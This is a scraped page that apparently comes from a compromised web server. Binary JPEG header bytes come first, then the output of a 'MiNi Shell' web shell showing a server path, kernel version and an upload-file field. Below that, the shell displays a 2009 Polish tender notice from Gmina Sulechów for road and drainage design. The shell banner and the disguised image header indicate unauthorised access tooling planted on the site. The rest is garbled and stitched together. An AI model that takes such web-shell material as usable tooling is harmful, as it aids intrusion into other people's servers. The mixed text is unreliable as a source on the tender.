JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/37500-N-2009.html

<p class="kh_header"><b>Sulechów: Opracowanie projektu drogi wraz z jej odwodnieniem w ramach zadania pn.: 
Budowa drogi ul. Wiejska, ul. St. Lema, J. Słowackiego w Sulechowie i Brzeziu k. Sulechowa</b><br>
<b>Numer ogłoszenia: 37500 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu drogi wraz z jej odwodnieniem w ramach zadania pn.: 
Budowa drogi ul. Wiejska, ul. St. Lema, J. Słowackiego w Sulechowie i Brzeziu k. Sulechowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie w ramach zadania pn.: Budowa drogi ul. Wiejska, ul. St. Lema, J. Słowackiego w Sulechowie i Brzeziu k. Sulechowa: 
1.1. dokumentacji projektowej, w tym:
1) projektów budowlanych w zakresie uwzględniającym specyfikę robót budowlanych - w 4 egzemplarzach, 
2) projektów wykonawczych - w 4 egzemplarzach,
przy czym projekt budowlany i wykonawczy musi uwzględniać branżę drogową i od-wodnienie terenu - drenaże, kanalizacja deszczowa, odwodnienie powierzchniowe wg potrzeb;
3) przedmiarów robót z wyliczeniem ilości - w 1 egzemplarzu.
4) informacji dotyczącej planu bezpieczeństwa i ochrony zdrowia - w 1 egzemplarzu.
1.2. specyfikacji technicznej wykonania i odbioru robót - w 1 egzemplarzu,
1.3. projektu zagospodarowania terenu - w 1 egzemplarzu;
1.4. projektu organizacji ruchu na czas wykonania robót - w 2 egzemplarzach;
1.5. projektu stałej organizacji ruchu - w 2 egzemplarzach;
1.6. opracowań kosztowych, w skład których wchodzą:
1) kosztorysy inwestorskie uproszczone;
2) kosztorysy inwestorskie szczegółowe z zestawieniem materiałów i sprzętu - w 1 egzemplarzu,
3) kosztorysy szczegółowe bez cen - w 1 egzemplarzu,
4) kosztorysy uproszczone ofertowe - w 1 egzemplarzu,
5) zbiorcze zestawienie kosztów realizacji zadania - w 1 egzemplarzu.
1.7. mapy do celów projektowych lub matrycy lewostronnej do celów projektowych w zakresie niezbędnym do opracowania dokumentacji projektowej.
2. Przewidywany zakres opracowania został przedstawiony na mapie zamieszczonej w rozdziale III Specyfikacji Istotnych Warunków Zamówienia.
3. Orientacyjna długość projektowanej drogi wynosi łącznie ok. 2100 m, w tym ciąg główny tj. ulice Wiejska, St. Lema, J. Słowackiego ok. 1640 m i boczne odnogi ok.460 m.
4. Przewidywana do projektowania droga jest publiczną drogą gminną łączącą drogę powiatową z drogą wojewódzką. W swoim przebiegu krzyżuje się z drogą krajową nr 32.
5. Zamawiający oczekuje, ze Wykonawca, po zapoznaniu się w terenie z aktualnym stanem drogi zaproponuje najbardziej optymalne rozwiązania projektowe tj. jej niezbędne i możliwe do za-projektowania parametry (np. szerokość jezdni, przebieg chodników, zieleń itp.).
6. W przypadku konieczności podziału działek na trasie projektowanej drogi Zamawiający pokryje koszty ewentualnych podziałów
7. Zamawiający nie przewiduje opracowania projektu oświetlenia drogowego.
8. W ramach odwodnienia drogi należy rozważyć możliwość sprowadzenia wody do:
a) istniejących zbiorników wodnych (stawów), 
b) rowów, które należy zaprojektować albo przewidzieć odtworzenie istniejących.
9. Opracowanie musi uwzględniać uzyskanie celów określonych w Narodowym Programie Przebudowy Dróg Lokalnych 2008-2011, w tym w szczególności wyposażenie drogi w rozwiązania i elementy wyposażenia drogi poprawiające bezpieczeństwo ruchu drogowego oraz powodujące zmianę zachowań uczestników ruchu drogowego. 
10. Zamówienie musi być wykonane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane (t. j. Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), rozporządzenia Ministra Infra-struktury z dnia 03 lipca 2003 r. (Dz. U. Nr 120, poz. 1133 z późn. zm.) w sprawie szczegóło-wego zakresu i formy projektu budowlanego oraz rozporządzenia Ministra Infrastruktury z dnia 02 września 2004 r. (Dz. U. Nr 202, poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, natomiast projekty organizacji ruchu muszą być zgodne z art. 10 ust. 12 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t. j. Dz. U. z 2005 r. Nr 108, poz. 908 z późn. zm.) w związku z rozporządzenia Ministra Infrastruktury z dnia 23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem (Dz. U. z 2003r. Nr 177, poz. 1729).
11. Zakres opracowania musi obejmować ewentualne projekty branżowe przebudowy infrastruktury podziemnej i naziemnej wynikające z uzgodnień branżowych z właścicielami sieci.
12. Dokumentację projektową oraz opracowania kosztowe należy opracować z podziałem na branże, a dodatkowo przed przystąpieniem do wykonania opracowań kosztowych ich podział na części, należy uzgodnić z Zamawiającym.
13. Dokumentacja projektowa musi zawierać w opisie wszystkie dane stanowiące podstawę do przyjętych rozwiązań projektowych.
14. Dokumentacja projektowa musi uwzględniać postanowienia miejscowego planu zagospodarowania przestrzennego. Wykonawca zobowiązany jest uzyskać wszelkie niezbędne uzgodnienia, opinie, zatwierdzenia oraz jeśli będą wymagane: decyzję o lokalizacji inwestycji celu publicznego, pozwolenie wodno prawne, decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. Wykonawca winien również  uzyskać decyzję o pozwoleniu na budowę wraz z zatwierdzeniem dokumentacji. Wszelkie opłaty z tym związane ponosi Wykonawca.
15. Ilości podane w pkt. 1 nie obejmują egzemplarzy niezbędnych do uzyskania uzgodnień i decyzji o których mowa w pkt 11.
16. Przekazanie przedmiotu umowy w ilościach określonych w pkt. 1 wraz z mapą lub matrycą lewostronną do celów projektowych i pozwoleniem na budowę nastąpi w siedzibie Zamawiające-go i wymaga protokolarnego potwierdzenia.
17. Opracowania określone w pkt. 1 muszą zostać przekazane Zamawiającemu w formie papierowej i elektronicznej w formacie otwartym (np. pdf,  jpg).
18. Wykonawca może przewidzieć wykonanie przedmiotu umowy przy pomocy podwykonawców.
19. Zamówienie może być realizowane do wysokości środków finansowych przeznaczonych w budżecie Gminy Sulechów na rok 2009 na realizację zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu:
1.1. Wykonawca musi spełniać warunki zawarte w art. 24 ust. 1 i 2 i w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
1.2. Doświadczenie zawodowe:
Wykonawca musi wykazać się zrealizowaniem, udokumentowanym np. referencjami, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech dokumentacji projektowych w branży drogowej.
1.3. Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia stanowiska projektanta z uprawnieniami do projektowania w branży drogowej.
2. Ocena spełniania warunków udziału, w postępowaniu, przez Wykonawców zostanie dokonana według kryterium spełnia/nie spełnia. Wykonawca nie spełniający warunków zostanie wykluczony z postępowania, a jego oferta odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenia i dokumenty, jakie mają dostarczyć Wykonawcy: 
1.1. Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu
1) Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2) W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych do oferty należy do-łączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcze-śniej, niż 6 miesięcy przed upływem terminu składania ofert.
3) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1.1.2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub go-spodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4) W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia do oferty muszą być dołączone:
a) wykaz usług wykonanych w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (np. referencje od poprzednich Zamawiają-cych),
b) wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwa-lifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności,
c) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wy-konania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1.1.4) lit. b, wyko-nawca wskazał osoby, którymi będzie dysponował.
1.2. Inne dokumenty:
1) Formularz oferty.
2) Dane Wykonawcy.
3) W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a) zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia pu-blicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonaw-ców,
b) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobo-wiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt 1.1.1) i 1.1.2)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego:
Urząd Miejski Sulechów
Plac Ratuszowy 6
66-100 Sulechów
pok. 217 II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2009 godzina 10:30, miejsce: Siedziba Zamawiającego:
Urząd Miejski Sulechów
Plac Ratuszowy 6
66-100 Sulechów
Biuro Obsługi Interesanta, pok. 002.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com